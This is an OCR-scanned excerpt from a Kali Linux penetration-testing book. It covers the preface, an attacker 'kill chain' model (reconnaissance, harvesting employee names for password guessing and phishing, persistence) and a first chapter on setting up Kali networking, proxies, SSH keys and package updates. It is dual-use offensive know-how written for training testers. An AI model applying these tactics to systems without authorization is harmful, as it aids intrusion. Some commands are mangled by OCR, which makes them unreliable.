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Preface 



This book is dedicated to the use of Kali Linux in performing penetration tests 
against networks. A penetration test simulates an attack against a network or 
a system by a malicious outsider or insider. Unlike a vulnerability assessment, 
penetration testing is designed to include the exploitation phase. Therefore, it proves 
that the exploit is present, and that it is accompanied by the very real risk of being 
compromised if not acted upon. 

Throughout this book, we will refer to "penetration testers," 

"attackers," and "hackers" interchangeably as they use the same 
techniques and tools to assess the security of networks and 
data systems. The only difference between them is their end 
objective — a secure data network, or a data breach. 

Most testers and attackers follow an informal, open source, or proprietary-defined 
testing methodology that guides the testing process. There are certain advantages of 
following a methodology: 

• A methodology identifies parts of the testing process that can be automated 
(for example, a tester may always use a ping sweep to identify potential 
targets; therefore, this can be scripted), allowing the tester to focus on 
creative techniques to find and exploit vulnerabilities 

• The results are repeatable, allowing them to be compared over time or to 
cross-validate one tester's results against another, or to determine how the 
security of the target has improved (or not!) over time 

• A defined methodology is predictable in terms of time and personnel 
requirements, allowing costs to be controlled and minimized 

• A methodology that has been preapproved by the client, protects the tester 
against liability in the event there is any damage to the network or data 




Preface 

Formal methodologies include the following well-known examples: 



• Kevin Orrey's penetration testing framework: This methodology walks 
the tester through the sequenced steps of a penetration test, providing 
hyperlinks to tools and relevant commands. More information can be found 
at www . vulnerabilityassessment . co . uk. 

• Information Systems Security Assessment Framework (ISSAF): 

This comprehensive guide aims to be the single source for testing a network. 
More information on this can be found at www . oissg . org. 

• NIST SP 800-115, technical guide to information security testing and 
assessment: Written in 2008, the four-step methodology is somewhat 
outdated. However, it does provide a good overview of the basic steps in 
penetration testing. You can get more information at http : //csrc . nist . 
gov/publications/nistpubs/800- 115/SP800- 115 . pdf. 

• Open Source Security Testing Methodology Manual (OSSTMM): 

This is one of the older methodologies, and the latest version attempts to 
quantify identified risks. More details can be found at www . osstmm . org. 

• Open Web Application Security Project (OWASP): This is focused on the 
10 most common vulnerabilities in web-based applications. More 
information on this can be found at www . owasp . org. 

• Penetration Testing Execution Standard (PTES): Actively maintained, 
this methodology is complete and accurately reflects on the activities 
of a malicious person. You can get more information at 

www . pentest - standard . org. 

• Offensive (Web) Testing Framework (OWTF): Introduced in 2012, this is a 
very promising direction in combining the OWASP approach with the more 
complete and rigorous PTES methodology. More details can be found at 
https : / / github . com/ 7a/owtf . 

Unfortunately, the use of a structured methodology can introduce weaknesses into 
the testing process: 

• Methodologies rarely consider why a penetration test is being undertaken, or 
which data is critical to the business and needs to be protected. In the absence 
of this vital first step, penetration tests lose focus. 

• Many penetration testers are reluctant to follow a defined methodology, 
fearing that it will hinder their creativity in exploiting a network. 
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• Penetration testing fails to reflect the actual activities of a malicious attacker. 
Frequently, the client wants to see if you can gain administrative access on 
a particular system ("Can you root the box?"). However, the attacker may 
be focused on copying critical data in a manner that does not require root 
access, or cause a denial of service. 

To address the limitations inherent in formal testing methodologies, they must 
be integrated in a framework that views the network from the perspective of an 
attacker, the "kill chain." 

The "Kill Chain" approach to 
penetration testing 

In 2009, Mike Cloppert of Lockheed Martin CERT introduced the concept that is 
now known as the "attacker kill chain." This includes the steps taken by an adversary 
when they are attacking a network. It does not always proceed in a linear flow as 
some steps may occur in parallel. Multiple attacks may be launched over time at the 
same target, and overlapping stages may occur at the same time. 

In this book, we have modified the Cloppert's kill chain to more accurately reflect 
on how attackers apply these steps when exploiting networks and data services. 

The following diagram shows a typical kill chain of an attacker: 



r 
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Preface 

A typical kill chain of an attacker can be described as follows: 



• Reconnaissance phase - The adage, "reconnaissance time is never wasted 
time", adopted by most military organizations acknowledges that it is better 
to learn as much as possible about an enemy before engaging them. For the 
same reason, attackers will conduct extensive reconnaissance of a target 
before attacking. In fact, it is estimated that at least 70 percent of the "work 
effort" of a penetration test or an attack is spent conducting reconnaissance! 
Generally, they will employ two types of reconnaissance: 

° Passive reconnaissance - This does not directly interact with the 
target in a hostile manner. For example, the attacker will review 
the publicly available website(s), assess online media (especially 
social media sites), and attempt to determine the "attack surface" 
of the target. 

One particular task will be to generate a list of past and current 
employee names. These names will form the basis of attempts 
to brute force, or guessing passwords. They will also be used 
in social engineering attacks. 

This type of reconnaissance is difficult, if not impossible, 
to distinguish from the behavior of regular users. 

° Active reconnaissance - This can be detected by the target but, 
it can be difficult to distinguish most online organizations' faces 
from the regular backgrounds. 

Activities occurring during active reconnaissance include 
physical visits to target premises, port scanning, and remote 
vulnerability scanning. 

• The delivery phase - Delivery is the selection and development of 
the weapon that will be used to complete the exploit during the attack. 

The exact weapon chosen will depend on the attacker's intent as well 
as the route of delivery (for example, across the network, via wireless, 
or through a web-based service). The impact of the delivery phase will 
be examined in the second half of this book. 
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• The exploit or compromise phase - This is the point when a particular 
exploit is successfully applied, allowing attackers to reach their objective. 

The compromise may have occurred in a single phase (for example, a known 
operating system vulnerability was exploited using a buffer overflow), 

or it may have been a multiphase compromise (for example, an attacker 
physically accessed premises to steal a corporate phone book. The names 
were used to create lists for brute force attacks against a portal logon. In 
addition, e-mails were sent to all employees to click on an embedded link to 
download a crafted PDF file that compromised their computers.). Multiphase 
attacks are the norm when a malicious attacker targets a specific enterprise. 

• Post exploit: action on the objective - This is frequently, and incorrectly, 
referred to as the "exfiltration phase" because there is a focus on perceiving 
attacks solely as a route to steal sensitive data (such as login information, 
personal information, and financial information); it is common for an attacker 
to have a different objective. For example, a business may wish to cause a 
denial of service in their competitor's network to drive customers to their 
own website. Therefore, this phase must focus on the many possible actions 
of an attacker. 

One of the most common exploit activity occurs when, the attackers 
attempt to improve their access privileges to the highest possible level 
(vertical escalation), and to compromise as many accounts as possible 
(horizontal escalation). 

• Post exploit: persistence - If there is value in compromising a network or 
system, then that value can likely be increased if there is persistent access. 
This allows attackers to maintain communications with a compromised 
system. From a defender's point of view, this is the part of the kill chain that 
is usually the easiest to detect. 

Kill chains are metamodels of an attacker's behavior when they attempt to compromise 
a network or a particular data system. As a metamodel, it can incorporate any 
proprietary or commercial penetration testing methodology. Unlike the methodologies, 
however, it ensures a strategic-level focus on how an attacker approaches the network. 
This focus on the attacker's activities will guide the layout and content of this book. 
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What this book covers 

This book is divided into two parts. In Part 1, The Attacker's Kill Chain, we will follow 
the steps of a kill chain, analyzing each phase in detail. In Part 2, The Delivery Phase, 
we will focus on the delivery phase and some of the available methodologies to 
understand how attacks take place, and how this knowledge can be used to secure 
a network. 

Chapter 1, Starting with Kali Linux, introduces the reader to the fundamentals of Kali 
Linux, and its optimal configuration to support penetration testing. 

Chapter 2, Identifying the Target - Passive Reconnaissance, provides a background on 
how to gather information about a target using publicly available sources, and the 
tools that can simplify the reconnaissance and information management. 

Chapter 3, Active Reconnaissance and Vulnerability Scanning, introduces the reader to 
stealthy approaches that can be used to gain information about the target, especially 
the information that identifies vulnerabilities, which could be exploited. 

Chapter 4, Exploit, demonstrates the methodologies that can be used to find and 
execute exploits that allow a system to be compromised by an attacker. 

Chapter 5, Post Exploit - Action on the Objective, describes how attackers can 
escalate their privileges to achieve their objective for compromising the system, 
including theft of data, altering data, launching additional attacks, or creating a 
denial of service. 

Chapter 6, Post Exploit - Persistence, provides a background on how to configure 
a compromised system so that the attacker can return at will and continue 
post-exploit activities. 

Chapter 7, Physical Attacks and Social Engineering, demonstrates why being able to 
physically access a system or interact with the humans who manage it provides 
the most successful route to exploitation. 

Chapter 8, Exploiting Wireless Communications, demonstrates how to take advantage 
of common wireless connections to access data networks and isolated systems. 

Chapter 9, Reconnaissance and Exploitation of Web-based Applications, provides a 
brief overview of one of the most complex delivery phases to secure: web-based 
applications that are exposed to the public Internet. 
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Chapter 10, Exploiting Remote Access Communications, provides an increasingly 
important route into systems as more and more organizations adopt distributed 
and work-from-home models that rely on remote access communications that are 
themselves vulnerable to attack. 

Chapter 11, Client-side Exploitation, focuses on attacks against applications on the 
end-user's systems, which are frequently not protected to the same degree as the 
organization's primary network. 

Appendix, Installing Kali Einux, provides an overview of how to install Kali Linux, 
and how to employ a whole-disk encryption to avoid an intercept of confidential 
testing data. 

What you need for this book 

In order to practice the material presented in this book, you will need virtualization 
tools such as VMware or VirtualBox. 

You will need to download and configure the Kali Linux operating system and its 
suite of tools. To ensure that it is up-to-date and that you have all of the tools, you 
will need access to an Internet connection. 

Sadly, not all of the tools on the Kali Linux system will be addressed since there are 
too many of them. The focus of this book is not to inundate the reader with all of 
the tools and options, but to provide an approach for testing that will give them the 
opportunity to learn and incorporate new tools as their experiences and knowledge 
change over time. 

Although most of the examples from this book focus on Microsoft Windows, the 
methodology and most of the tools are transferrable to other operating systems 
such as Linux and the other flavors of Unix. 

Finally, this book applies Kali to complete the attacker's kill chain against target 
systems. You will need a target operating system. Many of the examples in the book 
use Microsoft Windows XP. Although it is deprecated as of April 2014, it provides 
a "baseline" of standard behavior for many of the tools. If you know how to apply 
the methodology to one operating system, you can apply it to more recent operating 
systems such as Windows 7 and Windows 8. 
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Who this book is for 

This book is intended for people who want to know more about data security. 

In particular, it targets people who want to understand why they use a particular 
tool when they do, as opposed to those people who throw as many tools as possible 
at a system to see if an exploit will happen. My goal is for the readers to develop their 
own method and approach to effective penetration testing, which will allow them to 
experiment and learn as they progress. I believe that this approach is the only effective 
way to understand how malicious people attack data systems, and therefore, the only 
way to understand how to mediate vulnerabilities before they can be exploited. 

If you are a security professional, penetration tester, or just have an interest in the 
security of complex data environments, this book is for you. 



Conventions 

In this book, you will find a number of styles of text that distinguish between 
different kinds of information. Here are some examples of these styles, and an 
explanation of their meaning. 

Code words in text, database table names, folder names, filenames, file extensions, 
pathnames, dummy URLs, user input, and Twitter handles are shown as follows: 
"In this particular case, the VM has been assigned an IP address of 
192.168.204.132." 

A block of code is set as follows: 



# MSF port scanner 
onhost_add { 

println ( " [*] MSF Port Scanner New Host OpenPorts on$l" ); 
$console = console (); 



cmd ( $console , 
cmd ( $console , 
cmd ( $console , 



"use auxiliary/ scanner/portscan/ tcp" ) 
"set THREADS 12"); 

"set PORTS 139, 143"); 



# enter other ports as required 



cmd ( $console , 
cmd ( $console , 
cmd ( $console , 
cmd ( $console , 
cmd ( $console , 
cmd ( $console , 
cmd ( $console , 
db_sync ( ) ; 



"set RHOSTS $1"); 

"run -j ") ; 

"use auxiliary/ scanner/ discovery/udp_sweep" ) 
"set THREADS 12"); 

"set BATCHSIZE 256"); 

"set RHOSTS $1"); 

"run -j ") ; 
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Any command-line input or output is written as follows: 
root@kali~# update-rc.d networking defaults 

New terms and important words are shown in bold. Words that you see on the 
screen, in menus or dialog boxes for example, appear in the text like this: "If you 
double-click on the truecryptl icon, you will be taken to a File Browser view." 

^ Warnings or important notes appear in a box like this. 



Tips and tricks appear like this. 



Reader feedback 

Feedback from our readers is always welcome. Let us know what you think about 
this book — what you liked or may have disliked. Reader feedback is important for us 
to develop titles that you really get the most out of. 

To send us general feedback, simply send an e-mail to f eedback@packtpub . com, 
and mention the book title via the subject of your message. 

If there is a topic that you have expertise in and you are interested in either writing 
or contributing to a book, see our author guide on www . packtpub . com/ authors. 

Customer support 

Now that you are the proud owner of a Packt book, we have a number of things to 
help you to get the most from your purchase. 
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Errata 

Although we have taken every care to ensure the accuracy of our content, mistakes 
do happen. If you find a mistake in one of our books — maybe a mistake in the text or 
the code— we would be grateful if you would report this to us. By doing so, you can 
save other readers from frustration and help us improve subsequent versions of this 
book. If you find any errata, please report them by visiting http : //www . packtpub . 
com/submit-errata, selecting your book, clicking on the errata submission form link, 
and entering the details of your errata. Once your errata are verified, your submission 
will be accepted and the errata will be uploaded on our website, or added to any list of 
existing errata, under the Errata section of that title. Any existing errata can be viewed 
by selecting your title from http : / /www . packtpub . com/ support. 

Piracy 

Piracy of copyright material on the Internet is an ongoing problem across all media. 
At Packt, we take the protection of our copyright and licenses very seriously. If you 
come across any illegal copies of our works, in any form, on the Internet, please 
provide us with the location address or website name immediately so that we can 
pursue a remedy. 

Please contact us at copyright@packtpub . com with a link to the suspected 
pirated material. 

We appreciate your help in protecting our authors, and our ability to bring 
you valuable content. 

Questions 

You can contact us at questions@packtpub . com if you are having a problem with 
any aspect of the book, and we will do our best to address it. 
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Disclaimer 



The content within this book is for educational purposes only. It is designed to help 
users test their own system against information security threats and protect their 
IT infrastructure from similar attacks. Packt Publishing and the author of this book 
take no responsibility for actions resulting from the inappropriate usage of learning 
materials contained within this book. 




Part 1 



The Attacker's 
Kill Chain 

Starting with Kali Linux 

Identifying the Target - Passive 
Reconnaissance 

Active Reconnaissance and 
Vulnerability Scanning 

Exploit 

Post Exploit - Action on 
the Objective 



Post Exploit - Persistence 




Starting with Kali Linux 

Kali Linux (Kali) is the successor to the BackTrack penetration testing platform 
which is generally regarded as the de facto standard package of tools used to facilitate 
penetration testing to secure data and voice networks. This chapter provides an 
introduction to Kali, and focuses on customizing Kali to support some advanced 
aspects of penetration testing. By the end of this chapter, you will have learned: 

• An overview of Kali 

• Configuring network services and secure communications 

• Updating Kali 

• Customizing Kali 

• Extending Kali's functionality with third-party applications 

• Effective management of penetration tests 



Kali Linux 

BackTrack (BT), (www. of fensive- security . com) was released to provide an 
extensive variety of penetration testing and defensive tools that were perfect for 
auditors and network administrators interested in assessing and securing their 
networks. The same tools were used by both authorized and unauthorized 
(hackers) penetration testers. 

The final version of BackTrack, BT 5r3, was released in August 2012. Based on 
the Ubuntu Linux platform, it was widely adopted and supported by the security 
community. Unfortunately, its file architecture made it difficult to manage the 
array of tools and their accompanying dependencies. 




Starting with Kali Linux 

In BackTrack, all of the tools used for penetration testing were placed in the 
/pentest directory. Subfolders such as /web or /database helped to further define 
the location of tools. Finding and executing tools within this hierarchy could be 
counterintuitive. For example, is sqlninja, which identifies an SQL injection, a web 
vulnerability assessment tool, a web exploit tool, or a database exploit tool? 

In March 2013, BackTrack was superseded by Kali Linux, which uses a new platform 
architecture based on the Debian GNU/ Linux operating system. 

Debian adheres to the Filesystem Hierarchy Standard (FHS), which is a significant 
advantage over BackTrack. Instead of needing to navigate through the / pentest tree, 
you can call a tool from anywhere on the system because applications are included in 
the system path. 

Other features of Kali include the following: 

• Support for multiple desktop environments such as Gnome, KDE, LXDE, 
and XFCE, and provides multilingual support. 

• Debian-compliant tools are synchronized with the Debian repositories 
at least four times daily, making it easier to update packages and apply 
security fixes. 

• Support for ISO customizations, allowing users to build their own versions of 
Kali. The bootstrap function also performs enterprise-wide network installs 
that can be automated using pre-seed files. 

• ARMEL and ARMHF support allows Kali to be installed on devices such as 
Raspberry Pi, ODROID-U2/-X2, and the Samsung Chromebook. 

• Over 300 penetration testing data forensics and defensive tools are included. 
They provide extensive wireless support with kernel patches to permit the 
packet injection required by some wireless attacks. 

• Kali remains an open source project that is free. Most importantly, it is well 
supported by an active online community. 

Throughout this book, we'll be using a VMware virtual machine (VM) of 64-bit 
Kali (refer to Appendix, Installing Kali Linux for instructions on installing Kali). 

A VM is used because it makes it easy to rapidly execute certain applications 
in other operating systems, such as Microsoft Windows. In addition, a VM can 
be archived with the results from a penetration test, allowing the archive to be 
reviewed to determine if a particular vulnerability would have been detected 
with the toolset that was used for testing. 
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When Kali is launched, the user will be taken to the default desktop GUI with a menu 
bar at the top and a few simple icons. By selecting the menu item Applications, and 
then Kali Linux, the user will gain access to a menu system that contains the Top 10 
Security Tools as well as a series of folders, organized in the general order that would 
be followed during a penetration test, as shown in the following screenshot: 



J Accessories 


> 


yQ Electronics 


> 


+ % Graphics 


> 


Internet 


> 


Kali Linux > 


ftJi Office 


> 


Programming 


> 


§j|i] Sound & Video 


> 


CJ System Tools 


> 



Top 10 Security Tools 



Information Gathering 
*^3 Vulnerability Analysis 



Stress Testing 
B. Hardware Hacking 
^ Forensics 
[=J Reporting Tools 
1?T System Services 



Web Applications ^ > 


TK 

00 CMS Identification 


> 


^ Password Attacks 


> 


00 Database Exploitation 


> 


Wireless Attacks 


> 


*00 IDS/IPS Identification 


> 


fit Exploitation Tools 


> 


00 Web Application Fuzzers 


> 


(22 Sniffing/Spoofing 


> 


00 Web Application Proxies 


> 


Maintaining Access 


> 


00 Web Crawlers 


> 


Reverse Engineering 


> 


00 Web Vulnerability Scanners 


> 




The menu will be familiar to users of BT 5r3. However, there 
are some changes, which include simplified access to network 
services and communications. 



] 
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Configuring network services and secure 
communications 

The first step in being able to use Kali is to ensure that it has connectivity to either a 
wired or wireless network to support updates and customization. 

You may need to obtain an IP address by DHCP (Dynamic Host Configuration 
Protocol), or assign one statically. First, confirm your IP address using the if conf ig 
command from a terminal window, as shown in the following screenshot: 

root@kali: # ifconfig 

eth© Link encap: Ethernet HWaddr 0© :0c : 29 :56 :©d:09 

inet addr: 192. 168. 204. 132 Beast : 192 . 168 .204 .255 Mask : 255 .255.255 .6 
inet6 addr: fe8© : :2©c :29f f :fe56 :d©9/64 Scope: Link 
UP BROADCAST RUNNING MULTICAST MTU : 1500 Metric:! 

RX packets : 631852 errors:© dropped:© overruns:© frame:© 

TX packets : 359462 errors:© dropped:© overruns:© carrier:© 
collisions:© txqueuelen : 1006 

RX bytes: 873309953 [832.8 MIS) TX bytes : 388054 19 (37.G MiB) 

lo Link encap; Local Loopback 

inet addr: 127. ©.©.I Mask : 255 .© .0 .© 
inet6 addr: ::1/128 Scope:Host 
UP LOOPBACK RUNNING MTU: 65536 Metric:! 

RX packets : 157544 errors:© dropped:© overruns:© frame:© 

TX packets : 157544 errors:© dropped:© overruns:© carrier:© 
collisions;© txqueuelen:© 

RX b y tes: 37806955 (36.0 M iB) TX b y tes : 37806955 (36.6 MiB) 



In this particular case, the VM has been assigned an IP address of 192 . 168 . 204 . 132 . 
If an IP address was not obtained, an address can be assigned by DHCP using the 
command dhclient etho (or other available interfaces, which will depend on the 
specific configuration of the system being used). 

If a static IP address is used, additional information may be required. For example, 
you can assign a static IP of 192 . 168 . 204. 128 as follows: 

host IP address: 192.168.204.128 

subnet mask: 255.255.255.0 

default gateway: 192.168.204.1 

DNS server: 192.168.204.10 
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Enter a terminal window and enter the following command: 

root@kali:~# ifonconfig ethO 192.168.204.128/24 
root@kali:~# route add default gw 192.168.204.1 
root@kali:~# echo nameserver 192.168.204.10 > /etc/resolv . conf 

Changes made to IP settings are nonpersistent, and will be lost when Kali is 
rebooted. To make the changes permanent, you will need to edit the /etc/network/ 
interfaces file, as shown in the following screenshot: 



Original Edited 



jauto lo 


auto lo 


iface lo inet loopback 


iface lo inet loopback 




# primary network interface 


auto ethO 


# edited to maintain persistent state 


iface ethO inet dhcp 


auto ethe 




iface ethe inet static 




address 192 . 16B.2B4 . 128 


auto ethl 


netmask 255.255.255.8 


iface ethl inet dhcp 


network 192.1G8.2G4.0 




broadcast 192.168.204.255 


auto eth2 


gateway 192. 168. 264. 1| 


iface eth2 inet dhcp 


auto ethl 




iface ethl inet dhcp 


auto athO 




iface athO inet dhcp 


auto eth2 




iface eth2 inet dhcp 


auto wlanO 


auto athG 


iface wlanG inet dhcp 


iface athfl inet dhcp 



By default. Kali does not start with the DHCP service enabled. Doing so announces 
the new IP address on the network, and this may alert administrators about the 
presence of the tester. For some test cases, this may not be an issue, and it may be 
advantageous to have certain services start automatically during boot up. This can 
be achieved by entering the following commands: 

root@kali~# update-rc.d networking defaults 
root@kali~# /etc/init . d/networking restart 

Kali installs with network services that can be started or stopped as required, 
including DHCP, HTTP, SSH, TFTP, and the VNC server. These services are usually 
invoked from the command line, however, some are accessible from the Kali menu. 
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Adjusting network proxy settings 

Users located behind an authenticated or unauthenticated proxy 

connection must modify bash . bashrc and apt . conf . Both files are located in the 

/root/etc directory. 

1. Edit the bash . bashrc file, as shown in the following screenshot, use a text 
editor to add the following lines to the bottom of the bash . bashrc file: 
export f tp_proxy=" f tp : //user : pas sword@proxyIP : port" 
export http_proxy="http : //user : password@proxyIP : port " 
export https_proxy=" https : //user :password@proxyIP sport" 
export socks_proxy=" https : //user :password@proxyIP sport" 



bash. bashrc (/etc) - gedit 

File Edit View Search Tools Documents Help 






Open ¥ 



lJ ^bash.bashrr X 




fi 

# 

if 



if the command-not-found package is installed, use it 
[ -x /usr/lib/command-not-found -o -x /usr/share/command-not-found ] 
function command not foundhandle { 

# check because c-n-f could've been removed in the meantime 
if [ -x /usr/lib/command-not-found ]; then 
/usr/bin/python /usr/lib/command-not-found - 
return %? 

elif [ -x /usr/share/command-not-found ] ; then 
/usr/bin/python /usr/share/command-not-found 
return $? 
else 



then 



-- $1 



$1 



return 127 



fi 



fi 

export ftp_proxy= n ftp : //user : password^ roxylP : port' 1 
export http proxy =tl http : //user: password^ roxylP: port' 1 
export https_proxy= cl https: //user: password@proxyIP : port' 1 
export socks prQxy= e 'https|://user:password@prox yIP : port" 



Plain Text t Tab Width : 8 ▼ Ln 67, Col 26 



INS 



2. Replace proxy ip and port with your proxy IP address and port number 
respectively, and replace the username and password with your 
authentication username and password. If there's no need to authenticate, 
write only the part following the @ symbol. 

3. In the same directory, create the apt . conf file and enter the following 
command lines, as shown in the following screenshot: 
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1 ^ - x +apt*cofif {/etc/apt) - g 


edit 






1 File Edit View Search Tools Documents Help 






ys w °p en * J2. Save H 


Sr* Undo 


iU 


T 


| jj; *bash,bashrc H Li *apt,conf It 





Acquire: 

Acquire: 

Acquire: 

Acquire: 



ftp: : proxy " ftp: //user :password@proxyIP: port/" ; 
http: : proxy "http: //use r:password@proxyIP:port/ M ; 
https: : proxy "https: //user: password@proxyIP: port/" ; 
socks: : proxy "https: //user: password^ roxylP: port/" ; 



Plain Text t Tab Width: B? Ln 4, Col 61 



INS 



4. Save and close the file. Log out and then log in to activate the new settings. 

Securing communications with Secure Shell 

To minimize detection by a target network during testing. Kali does not enable any 
externally-listening network services. Some services, such as Secure Shell (SSH), 
are already installed. However, they must be enabled prior to use. 

Kali comes preconfigured with default SSH keys. Before starting the SSH service, 
it's a good idea to disable the default keys and generate a unique keyset for use. 

Move the default SSH keys to a backup folder, and then generate a new SSH keyset 
using the following command: 

dpkg- reconfigure openssh- server 

The process of moving the original keys and generating the new keyset is shown in 
the following screenshot. 

root@kali: # cd /etc/ssh/ 
root@kali: etc/ssh# mkdir key s_de fault 
root@kali: /etc/ssh# mv ssh_host_* keys_default 
root@kali: /etc/ssh# dpkg- reconfigure openssh -server 
Creating SSH2 RSA key; this may take some time . . . 

Creating SSH2 DSA key; this may take some time . . . 

Creating SSH2 ECDSA key; this may take some time . . . 

insserv: warning: current start runlevel(s) (empty) of script 'ssh' overrides LS 
B defaults (2345). 

insserv: warning: current stop runlevel(s) (2 3 4 5) of script "ssh 1 overrides L 
SB defaults (empty) . 

root@kali: etc/ssh# | 
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To verify that the newly generated keys are unique, calculate their md5sum hash 
values, and compare with the original keys as shown in the following screenshot. 



root@kali:/etc/ssh# mdBsum ssh_host_* 
3bdeeG27a57fQ0f0db89a0bb40b9f5el ssh_host 
fb64b47d662066c80247e5ab012f7009 ssh_host" 
13f9e458b804bclcbe922463668e0c27 ssh_host" 
7c4cG41220029c5594a380b96213f883 ssh_host“ 
7f3bb5caeabla3bf77659a4d69d5de46 ssh_host_ 
d29a3bc700a98el3b77aee5eae731090 ssh_host_ 
root@kali:/etc/ssh# cd key s_de fault/ 
root@kali:/etc/ssh/keys_default# mdSsurn * 
71al5f49aaGc75ca0f8dadb5802eclef ssh_host_ 
bf 1487ee28307fb6ba842857a4aaeel4 ssh_host“ 
16eelG71cf65e80c5f6bd9ab6553b4ef ssh_host_ 
f90c3f0b708c4ede4c5ela3dle08325a ssh_host_ 
248ebG13d46c64a9d61bc579787b4199 ssh_host" 
8610af2d6dl5251f458824268b8817b9 ssh_host" 
root@kali : /etc/ssh/keys_def ault# | 



dsa_key 
dsa_key .pub 
ecdsa_key 
ecdsa_key .pub 
_rsa_key 
rsa_key .pub 



dsa_key 
dsa_key .pub 
eedsa_key 
ecdsa_key .pub 
_rsa_key 
rsa_key .pub 



To start the SSH service using the menu, select Applications | Kali Linux | 
System Services | SSHD | SSHD Start. 

To start SSH from the command line, use the command line shown in the 
following screenshot: 

rootQkali: # /etc/init .d/ssh start 
[ ok ] Starting GpenBGD Secure Shell server: sshd . 

root@kali: # | 



To verify that SSH is running, perform a nets tat query, as shown in the 
following screenshot: 



root@kali:~# netstat -antp 

Active Internet connections (servers and established) 

Proto Recv-Q Send-Q Local Address Foreign Address State 

PID/Program name 

tcp 0 0 0.0.0.0:22 0.0. 0.0:* LISTEN 

19783/sshd 



The SSH daemon is listening on port 22 in the previous example. To stop SSH, use 
the following command: 

/etc/init . d/ssh stop 
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Updating Kali Linux 

Kali must be patched regularly to ensure that the base operating system and 
applications are up-to-date and that security patches have been applied. 

The Debian package management system 

Debian's package management system relies on discrete bundled applications 
called packages. Packages can be installed or removed by the user to customize the 
environment, and support tasks such as penetration testing. They can also extend 
the functionality of Kali, supporting tasks, such as communications (Skype, instant 
messaging, and secure e-mails) or documentation (OpenOffice and Microsoft Office 
running under Wine). 

Packages are stored in repositories and are downloaded to the system user to ensure 
the integrity of the package. 

Packages and repositories 

By default. Kali uses only the official Kali repositories. It is possible that an 
incomplete installation process may not add the repositories to the correct sources . 
list file, or that you may wish to extend the available repositories when new 
applications are added. 

Updating the source .list file can be done from the command line (echo deb 
http://http.kali.org/kiali kali main contrib non-free >> /etc/ apt/ 
sources . list), or by using a text editor. 

The default package repositories that should be present in /etc/apt/sources . list 
are listed as follows; if not present, edit the sources.list file to include them: 

## Kali 

deb http://http.kali.org/kali kali main contrib non-free 
## Kali-dev 

deb http://http.kali.org/kali kali-dev main contrib non-free 
## Kali Security updates 

deb http://security.kali.org/kali-security kali/updates main 
contrib non-free 

Not every Kali tool is presently maintained in the official tool repositories. If you 
choose to update a tool manually, it is possible that you will overwrite existing 
packaged files and break dependencies. Therefore, some tools that have not been 
officially moved to Debian repositories, such as the aircrack-ng, dnsrecon, sqlmap, 
beef -xss, and Social Engineering Toolkit (se-toolkit), are maintained in the Bleeding 
Edge repository. This repository may also be added to sources . list using the 
following command line: 

## Bleeding Edge repository 

deb http://repo.kali.org/kali kali kali -bleeding-edge main 
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Dpkg 

Dpkg is Debian's package management system. This command-line application is 
used to install, remove, and query packages. In general, dpkg performs actions on 
individual packages. 

dpkg is particularly useful in compiling a list of installed 
applications in Kali using the command dpkg - 1 > list, txt . 

If you want to know if a specific tool is installed, use dpkg - 1 | 
grep ctool name>. 

The following screenshot shows an excerpt of the returned data when dpkg -1 is 
invoked, providing a list of all applications installed on the Kali distribution; this is 
particularly useful in identifying applications that may only be accessible directly 
from the command line. 




root@kali:~# dpkg -1 

3esired=Unknown/Install/Remove/Purge/Hold 

| Status=Not/Inst/Conf -files/Unpacked/halF-conf/Half -inst/t rig-aWait/T rig-pend 
j/ Err?=(none)/Reinst- required (Status, Err: uppercase=bad) 



11/ 

f++ 

ii 


Name 


Version 


Architecture 


Description 


acccheck 


0.2. 1 -lkali3 


amd64 


Password dictionary attack tool for 


ii 


accountsservice 


0.6.21-8 


amd64 


query and manipulate user account in 


ii 


ace-voip 


1 . 10-lkali4 


amd64 


A simple VoIP corporate directory en 


ii 


acl 


2.2.51-8 


amd64 


Access control list utilities 


ii 


adduser 


3 . 113+nmu3 


all 


add and remove users and groups 


ii 


af flib-tools 


3.7.1 -0kali3 


amd64 


support for Advanced Forensics forma 


ii 


airc rack-ng 


1 .2~svn2256+ 


amd64 


An 802.11 WEP and WPA-PSK key cracki 



Using Advanced Packaging Tools 

Advanced Packaging Tools (APT), extend the functionalities of dkpg by searching 
repositories and installing or upgrading packages along with all the required 
dependencies. The APT can also be used to upgrade a complete distribution. 

The most common apt commands are as follows: 

• apt -get update: This is used to resynchronize the local package index 
files with their source as defined in /etc/apt/sources . list. The update 
command should always be used first, before performing an upgrade or 
dist-upgrade. 

• apt -get upgrade: This is used to install the newest versions of all packages 
installed on the system using /etc/apt/sources . list. Packages that are 
installed on Kali with new versions available are upgraded. The upgrade 
command will not change or delete packages that are not being upgraded, 
and it will not install packages that are not already present. 
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• apt -get dist -upgrade: This upgrades all packages currently installed on 
the system and their dependencies. It also removes obsolete packages from 
the system. 

The apt -get command can also be used to show a full description of a 
package and identify its dependencies (apt -cache show <package name>) 
or remove a package (apt -get remove <package name>). 






Some applications are not upgraded by the apt -get command. For example, 
the local copy of the exploit -db archive must be manually upgraded. Create a 
script named update . sh and add the following commands to it, to automate the 
update process: 

cd /usr/share/exploitdb 

wget http : //www. exploit -db . com/archive . tar ,bz2 
tar -xv j f archive . tar ,bz2 
rm archive . tar ,bz2 

Configuring and customizing Kali Linux 

Kali is a framework that is used to complete a penetration test. However, the 
tester should never feel tied to the tools that have been installed by default, or 
by the look and feel of the Kali desktop. By customizing BackTrack, a tester can 
increase the security of client data that is being collected, and make it easier to 
do a penetration test. 

Common customizations made to Kali include: 

• Resetting the root password 

• Adding a non-root user 

• Speeding up Kali operations 

• Sharing folders with MS Windows 

• Creating encrypted folders 



Run the apt - get update command and the upgrade command at 
start-up to ensure your session is using the most up-to-date tools. The 
easiest way to do this is to create an update . sh script that includes the 
following command line: 

apt-get update && apt-get upgrade -y && apt-get dist- 
upgrade -y 
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Resetting the root password 

To change a user password, use the following command: 

passwd root 

You will then be prompted to enter a new password, as shown in the 
following screenshot: 



root@kali: # passwd root 
Enter new UNIX password: 

Retype new UNIX password: 

passwd: password updated successfully 

root@kali: # | 

Adding a non-root user 

Many of the applications provided in Kali must run with root-level privileges 
in order to function. Root-level privileges do possess a certain amount of risk, 
for example, miskeying a command or using the wrong command can cause 
applications to fail or even damage the system being tested. In some cases, it is 
preferable to test with user-level privileges. In fact, some applications force the use 
of lower-privilege accounts. 

To create a non-root user, you can simply use the command adduser from the terminal 
and follow the instructions that appear, as shown in the following screenshot: 

root@kali:-# adduser no root 
Adding user 'no root' ... 

Adding new group 'no root' (1001) ... 

Adding new user 'no root' (1001) with group 'no root' ... 

Creating home directory ' /home/no root 1 ... 

Copying files from '/etc/skel' ... 

Enter new UNIX password: 

Retype new UNIX password: 
